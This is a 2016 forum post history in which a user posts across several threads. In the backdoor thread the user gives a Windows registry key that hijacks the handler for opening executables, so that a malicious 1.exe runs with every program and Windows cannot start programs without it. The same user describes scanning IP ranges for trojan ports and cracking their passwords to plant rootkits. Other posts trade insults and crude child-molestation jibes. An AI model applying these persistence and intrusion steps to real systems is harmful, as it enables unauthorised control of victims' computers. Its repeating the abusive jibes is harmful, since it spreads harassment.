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2016-09-16 at 3:33 PM UTC in Sometimes I feel bad that I don't talk to my parents.
Parental influence gets overrated but there is no question you broke the toaster, Spectral. You probably shaked it too hard to hear what's inside.
That didn't even scare me. -
2016-09-16 at 2:56 AM UTC in Have you ever been stark staring mad?Truly crazy people don't know they're crazy, so if you know you're crazy, or even think you've been crazy, then you most probably aren't, and weren't.
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2016-09-16 at 2:46 AM UTC in Sometimes I feel bad that I don't talk to my parents.It's like.... on Christmas morning. Everyone is gathered round the tree in the living room. Everyone has one present. Everyone opens their and is thrilled and satisfied, but you open yours and it's a broken toaster with the push handle busted off. You don't say anything, because you don't want to spoil it for everyone else, but deep down inside, you're seething, feeling worthless, feeling like a failure. And it's all because you just HAD to be the one who got the broken kid.
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2016-09-16 at 12:33 AM UTC in Sometimes I feel bad that I don't talk to my parents.The parents can do everything perfectly right and still come out with a loser. That's why they get so resentful and hurtful. They wasted 25+ years of their fucking life! Just imagine if that happened to you! It's like putting $1,000 in the bank, waiting 25 years for the interest to accumulate, then being told you are only owed $9.99 and the rest got lost somewhere, but they don;t know where. I WANT MY MONEY AND I WANT IT NOOOWWWW!!
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2016-09-13 at 9:20 AM UTC in It is with great sadness to tell you guys that bumble took her life.
uh oh someone sounds triggered! you're fairly predictable , before even clicking on the thread I knew your comment was directed towards me. Step up yo game bitchboi number 2!
Watch out he doesn't ban you 300 times. -
2016-09-13 at 9:17 AM UTC in More than 300 raindeer killed by lightening in norway. End of times?Psycho and aldra don't scare me.
Community scaring! -
2016-09-12 at 7:06 PM UTC in How To Integrate a Backdoor Into a Windows OS As a Shell of the OS Itself
Sure, there's probably thousands of machines with subseven on them (probably old XP boxes running in hydroelectric dams or factories), but this is really old.
Not thousands. Millions. New trojans still come out every day, operating on new port numbers, and they still work perfectly on Windows versions above WinXP, right up to the most recent version. Nothing has changed since the '90's. If you were to scan IP ranges right now for modern known trojans on their corresponding ports, you would still get hundreds of hits in just a few hours, especially if you use an ultra-highspeed "half-open" port scanner.
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2016-09-12 at 6:56 PM UTC in More than 300 raindeer killed by lightening in norway. End of times?
http://www.atmo.arizona.edu/students...SciAmNov88.pdf
haven't read it all, just skimmed over it so will wait to comment fully
it indicates a thunderstorm (not just a single lightning strike) can potentially rival the daily output of a nuclear power plant
also makes a point of talking about the difference between voltage difference and effective power delivered to ground.
fyi if you want to make an argument as to how much power a lightning strike can deliver, you need to consider wattage, ie. both voltage and amperage because one or the other alone means nothing in that regard.
After reading the entire article, I concluded that there were no specific measurements provided in it, and, secondly, that psycho's babblings were merely sloppy guesswork. Thank you for that. -
2016-09-12 at 6:08 AM UTC in More than 300 raindeer killed by lightening in norway. End of times?Bill Krozby. Psycho is deliberately not providing a single sourced reference of a lightning bolt's energy measurement, and yet he professes to be an expert on the subject.
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2016-09-12 at 6:03 AM UTC in How To Integrate a Backdoor Into a Windows OS As a Shell of the OS ItselfMost trojan front ends have remote registry read/write capability, so it's simply a matter of pressing a couple of buttons and the target machine's registry is right there. For example, after port scanning IP ranges for open known trojan ports, finding a few dozen that aren't honey pots, logging into them with the corresponding front ends after cracking the passwords, whatever, upload server with registry access, lock the r00tkit executable file into place using the registry key... most users would probably try and delete the file, then undelete it and restore it when they found out it broke everything. This provides the intruder more time to use the connection for various nefarious purposes, before the key is finally discovered.
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2016-09-12 at 4:59 AM UTC in How To Integrate a Backdoor Into a Windows OS As a Shell of the OS ItselfThe value is:
1.exe "%1" %*
Anything else and it won't work.
The purpose is to force the target machine to keep 1.exe in place on the system.
The registry automatically looks for the file in %WIN% and %SYSTEM%. You don't have to specify a PATH.
If 1.exe is removed from the system or renamed, the system will be unable to execute any EXE files at all. That means starting a random executable not only starts 1.exe, but also, the starting of that random .exe is dependent on having 1.exe in the %WIN% or %SYSTEM% or root of the drive, or the specified PATH if desired. Remove the 1.exe and you can no longer start any executable.
Try it for yourself. Copy regedit.exe and rename in regedit.com, start regedit.com, add the key, take calc.exe and rename it 1.exe and put it in the Windows system folder. Now start mspaint.exe. You will see 1.exe will also start. Now delete 1.exe. Try and start mspaint.exe again. Can't. Put 1.exe back in the system folder. Now mspaint.exe starts normally. -
2016-09-11 at 2:38 AM UTC in How To Integrate a Backdoor Into a Windows OS As a Shell of the OS Itself
didn't ADS get deprecated after windows XP?
I could use a symbolic link to run the executable in ADS in Windows versions above WinXP. -
2016-09-11 at 1:15 AM UTC in How To Integrate a Backdoor Into a Windows OS As a Shell of the OS ItselfListen, molester, like I said, if the 1.exe file is removed from the system path, no executables will be able to execute. The key not only runs 1.exe when an executable is started, it also makes it mandatory that 1.exe be in the system path to execute any executables. As for the key itself, not many people could even find it to change it back.
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2016-09-10 at 6:44 PM UTC in How To Integrate a Backdoor Into a Windows OS As a Shell of the OS ItselfWhat you'd want to do is wrap a malicious shell around a critical operating system component, in such a way that Windows is unable to operate without it.
Method: Wrap the malicious executable around the executable function itself
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
Key Value:
1.exe "%1" %*
Note: If 1.exe is removed or renamed from the system path, executable files will no longer be able to be executed
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2016-09-09 at 7:39 PM UTC in I'm NOT ..............
im a robot and a pedo. beep boop bop must fuck yo daughters
You and ENTER should team up. -
2016-09-09 at 7:38 PM UTC in More than 300 raindeer killed by lightening in norway. End of times?The only education he has is molesting 4-year-old children.
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2016-09-09 at 3:52 PM UTC in I'm slowly turning into obbeExistence is perception, and perception is thought, therefore, existence is thought. Scary, innit?
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2016-09-09 at 3:49 PM UTC in More than 300 raindeer killed by lightening in norway. End of times?Well, psycho, looks like you've been shot down yet again. Can't even provide a single, solitary measurement of a lightning bolt's energy. I am disappoint.
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2016-09-08 at 5:47 PM UTC in I'm NOT ..............Your impedes is being imminently impeded.
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2016-09-08 at 1:52 PM UTC in More than 300 raindeer killed by lightening in norway. End of times?
At least i know you don't know math nor physics.
Ok, Mr. Kiddie Fiddler. If you're as knowledgeable as you say you are, please provide a single instance of a measurement which was taken of a lightning bolt's energy. I'd like to see the exact result, who took the measurement, and where the result was obtained.